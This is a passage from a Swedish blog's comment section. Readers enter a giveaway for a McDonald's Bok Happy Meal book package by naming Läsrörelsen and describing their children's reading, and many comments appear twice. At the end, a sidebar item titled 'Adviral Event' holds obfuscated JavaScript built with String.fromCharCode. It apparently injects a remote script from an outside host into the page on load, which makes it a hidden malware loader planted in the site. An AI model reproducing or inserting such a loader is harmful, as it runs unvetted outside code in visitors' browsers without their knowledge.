  Jag vill vinna paketet till min 2,5-åriga son som älskar böcker. Vi läser alltid varje kväll och han hämtar gärna en bok för en mysig stund i soffan. Jag är utbildad lärare och vet verkligen hur viktig läsningen är för barns språk, stimulerar språk, ordförråd och fantasin. Det är vår skyldighet som föräldrar att läsa för våra barn och ger oss även en lugn stund tillsammans.

 96. Det är Läsrörelsen som samarbetar med McDonald’s.

  Jag vill vinna paketet till min 2,5-åriga son som älskar böcker. Vi läser alltid varje kväll och han hämtar gärna en bok för en mysig stund i soffan. Jag är utbildad lärare och vet verkligen hur viktig läsningen är för barns språk, stimulerar språk, ordförråd och fantasin. Det är vår skyldighet som föräldrar att läsa för våra barn och ger oss även en lugn stund tillsammans.

 97. Läsrörelsen
  Vill vinna för att min lille älskar böcker, bläddra i, högläsning ur och 8 nya böcker vore toppen till hans lilla bibliotek!

 98. Läsrörelsen

  Vill vinna för att min lille älskar böcker, bläddra i, högläsning ur och 8 nya böcker vore toppen till hans lilla bibliotek!

 99. Hej!
  Svar: Läsrörelsen och McDonalds
  Min dotter älskar att läsa böcker och även jag, min dotter vill gärna läsa böckerna om och om igen, men själv så tröttnar jag rätt snabbt därför vill jag gärna några nya bra böcker vinna! Perfekt julklapp till min dotter!
  Ha en bra kväll!
  /Emma

 100. Hej!

  Svar: Läsrörelsen och McDonalds

  Min dotter älskar att läsa böcker och även jag, min dotter vill gärna läsa böckerna om och om igen, men själv så tröttnar jag rätt snabbt därför vill jag gärna några nya bra böcker vinna! Perfekt julklapp till min dotter!

  Ha en bra kväll!

  /Emma

 101. Vilken läsfrämjande organisation samarbetar med McDonald’s Bok Happy Meal?
  Svar: Organisationen Läsrörelsen samarbetar med McDonald´s sen 2001 med Bok Happy Meal.
  Jag hoppas på vinst och ett härligt bokpaket som jag hade spridit lite glädje med till min syster och hennes två små och som gett dem mycket glädje på vinterkvällarna.

 102. Vilken läsfrämjande organisation samarbetar med McDonald’s Bok Happy Meal?
  Svar: Organisationen Läsrörelsen samarbetar med McDonald´s sen 2001 med Bok Happy Meal.

  Jag hoppas på vinst och ett härligt bokpaket som jag hade spridit lite glädje med till min syster och hennes två små och som gett dem mycket glädje på vinterkvällarna.

 103. -Svar; Läsrörelsen!
  -Motivering; Har en son i samma ålder som Ludvig. Håller just nu på att samla på mig böcker till honom. Att få bokpaket med 8 böcker från Bok Happy Meal i hans bokhylla skulle kännas kanonbra, mest för att vi kommer att bo utomlands under en längre period och inte kommer att ha tillgång till böcker på svenska. Lässtunden innan läggdags var bland det bästa jag visste när jag var liten och min önskan är att Elvin också blir intresserad av böcker. Så nu håller vi tummarna, jag och Elvin!

 104. -Svar; Läsrörelsen!

  -Motivering; Har en son i samma ålder som Ludvig. Håller just nu på att samla på mig böcker till honom. Att få bokpaket med 8 böcker från Bok Happy Meal i hans bokhylla skulle kännas kanonbra, mest för att vi kommer att bo utomlands under en längre period och inte kommer att ha tillgång till böcker på svenska. Lässtunden innan läggdags var bland det bästa jag visste när jag var liten och min önskan är att Elvin också blir intresserad av böcker. Så nu håller vi tummarna, jag och Elvin!

 105. 2001
  Jag hoppas på nya böcker till min och min dotters lässtunder..Vi har några böcker som börjar falla isär efter otaliga bläddringar så nya böcker vore perfekt!

 106. Läsrörelsen!
  Vår sexåring har öppnat ögonen för läsandets underbara värld och upptäckte Lasse-Majas detektivbyrå via Happy Meal förra omgången. Att vinna bokpaketet skulle ge oss en kanonjul, då båda barnen skulle få läsa och bli lästa för tills ögonen blöder ?

 107. 2001
  Jag hoppas på nya böcker till min och min dotters lässtunder..Vi har några böcker som börjar falla isär efter otaliga bläddringar så nya böcker vore perfekt!

 108. Läsrörelsen!

  Vår sexåring har öppnat ögonen för läsandets underbara värld och upptäckte Lasse-Majas detektivbyrå via Happy Meal förra omgången. Att vinna bokpaketet skulle ge oss en kanonjul, då båda barnen skulle få läsa och bli lästa för tills ögonen blöder 😉

 109. Svar: Läsrörelsen ar organisationen som samarbetar med McDonald’s!
  Skulle sa garna vilja vinna detta bokpaket da jag bor med min tvaariga dotter i Brasilien och kampar for fullt for att svenskan ska komma sa naturligt som mojligt for henne. Hon har precis upptackt bocker och vara fa Ludde- och Tottebocker borjar bli valdigt utslitna trots att jag gor vad jag kan for att de ska halla i sa lange som bara mojligt! Att fortsatta in i sagornas varld pa svenska ar en sjalvkarhet for mig och oss sa darfor skulle detta vara en fantastisk skatt om det kom i vara agor!

 110. Svar: Läsrörelsen ar organisationen som samarbetar med McDonald’s!

  Skulle sa garna vilja vinna detta bokpaket da jag bor med min tvaariga dotter i Brasilien och kampar for fullt for att svenskan ska komma sa naturligt som mojligt for henne. Hon har precis upptackt bocker och vara fa Ludde- och Tottebocker borjar bli valdigt utslitna trots att jag gor vad jag kan for att de ska halla i sa lange som bara mojligt! Att fortsatta in i sagornas varld pa svenska ar en sjalvkarhet for mig och oss sa darfor skulle detta vara en fantastisk skatt om det kom i vara agor!

 111. Läsrörelsen
  Jag har precis börjat jobba igen efter senaste mammaledigheten och på vardagarna hinner jag knappt träffa sönerna på kvällen. Därför är nattningen med tillhörande bokläsning en helig stund. Det vore jätteskoj att få överraska sönerna med lite nya böcker vars handling vi kan njuta av tillsammans.

 112. Svar: läsrörelsen har ett samarbete med mcdonalds.
  Åh Lindgren, Lööf och Stark. Tänk att vinna och kunna läsa hemma eller ute i en park. Hade vart roligt att vinna vårt kommande barns första bokpaket som blir ett minne för livet. Jag håller nu tummarna men tar inget för givet.

 113. Läsrörelsen

  Jag har precis börjat jobba igen efter senaste mammaledigheten och på vardagarna hinner jag knappt träffa sönerna på kvällen. Därför är nattningen med tillhörande bokläsning en helig stund. Det vore jätteskoj att få överraska sönerna med lite nya böcker vars handling vi kan njuta av tillsammans.

 114. Läsrörelsen samarbetar med McDonalds.
  Vi skulle verkligen vilja vinna detta bokpaket! Min mamma och pappa läste mycket sagor för oss när vi var små och det vill jag även göra för mina barn. Böcker är något som alltid står på önskelistan för det är något man aldrig kan ha för mycket av.

 115. Hej!
  McDonalds samarbetar med Läsrörelsen.
  Min son älskar böcker men har inte så många. Detta paket skulle vara ett mycket välkommet tillskott!
  Mvh Karin

 116. Svar: Läsrörelsen har ett samarbete McDonald’s Bok Happy Meal.
  Det vore helt fantastiskt kul att vinna lite nya böcker till dottern. Hon fyllde 7 år för två veckor sedan och kämpar stenhårt i skolan (där hon går i första klass) med att lära sig läsa. För mig som ensamstående förälder känner jag ofta att jag har extra krav på mig att hjälpa, stötta och finnas där för henne i hennes utveckling. Det vore därför riktigt bra att vinna hem ett gäng nya böcker att läsa tillsammans så hon får chansen att öva, för är det något jag vill är det att finnas där för henne så mycket det bara går.
  Kram Sanna

 117. Svar: läsrörelsen har ett samarbete med mcdonalds.

  Åh Lindgren, Lööf och Stark. Tänk att vinna och kunna läsa hemma eller ute i en park. Hade vart roligt att vinna vårt kommande barns första bokpaket som blir ett minne för livet. Jag håller nu tummarna men tar inget för givet.

 118. Läsrörelsen samarbetar med McDonalds.
  Vi skulle verkligen vilja vinna detta bokpaket! Min mamma och pappa läste mycket sagor för oss när vi var små och det vill jag även göra för mina barn. Böcker är något som alltid står på önskelistan för det är något man aldrig kan ha för mycket av.

 119. Hej!
  McDonalds samarbetar med Läsrörelsen.

  Min son älskar böcker men har inte så många. Detta paket skulle vara ett mycket välkommet tillskott!

  Mvh Karin

 120. Svar: Läsrörelsen har ett samarbete McDonald’s Bok Happy Meal.

  Det vore helt fantastiskt kul att vinna lite nya böcker till dottern. Hon fyllde 7 år för två veckor sedan och kämpar stenhårt i skolan (där hon går i första klass) med att lära sig läsa. För mig som ensamstående förälder känner jag ofta att jag har extra krav på mig att hjälpa, stötta och finnas där för henne i hennes utveckling. Det vore därför riktigt bra att vinna hem ett gäng nya böcker att läsa tillsammans så hon får chansen att öva, för är det något jag vill är det att finnas där för henne så mycket det bara går.

  Kram Sanna

 121. Läsrörelsen samarbetar med Mc Donalds.
  Vill bygga upp ett bibliotek med böcker åt min dotter för jag anser att läsningen är viktig och vill ge henne massor av böcker så hon kan dyka in i böckernas värld.

 122. Läsrörelsen samarbetar med Mc Donalds.

  Vill bygga upp ett bibliotek med böcker åt min dotter för jag anser att läsningen är viktig och vill ge henne massor av böcker så hon kan dyka in i böckernas värld.

 123. LÄSRÖRELSEN
  Jag är sjukt trött på 3 åringens favoritbok som jag ”måste” läsa varje kväll – vi skulle verkligen behöva lite nya böcker och hitta en eller flera nya favoriter! ?
  Skulle bli väldigt glad om vi fick vinna bokpaketet till min 3 åring och kommande bebis! ? (BF i december!)

 124. LÄSRÖRELSEN

  Jag är sjukt trött på 3 åringens favoritbok som jag ”måste” läsa varje kväll – vi skulle verkligen behöva lite nya böcker och hitta en eller flera nya favoriter! 🙂
  Skulle bli väldigt glad om vi fick vinna bokpaketet till min 3 åring och kommande bebis! 🙂 (BF i december!)

 125. Läsrörelsen samarbetar med Mc Donalds
  Det här skulle vara en perfekt gemensam julklapp till mina tre tjejer. Böcker är så bra och dom älskar att lyssna när vi läser.

 126. Läsrörelsen samarbetar med Mc Donalds

  Det här skulle vara en perfekt gemensam julklapp till mina tre tjejer. Böcker är så bra och dom älskar att lyssna när vi läser.

 127. Svar: Läsrörelsen. Jag har en son på fem månader som jag brukar läsa för då jag själv minns hur mysigt de va o ligga bredvid min mor när hon läste när vi va små. Jag vill visa han glädjen med böcker i detta film/spel/ipad samhälle o visa hur kul de e o själv hitta på hur figurerna i en bok ska se ut o låta. Håller tummarna!

 128. Svar: Läsrörelsen. Jag har en son på fem månader som jag brukar läsa för då jag själv minns hur mysigt de va o ligga bredvid min mor när hon läste när vi va små. Jag vill visa han glädjen med böcker i detta film/spel/ipad samhälle o visa hur kul de e o själv hitta på hur figurerna i en bok ska se ut o låta. Håller tummarna!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/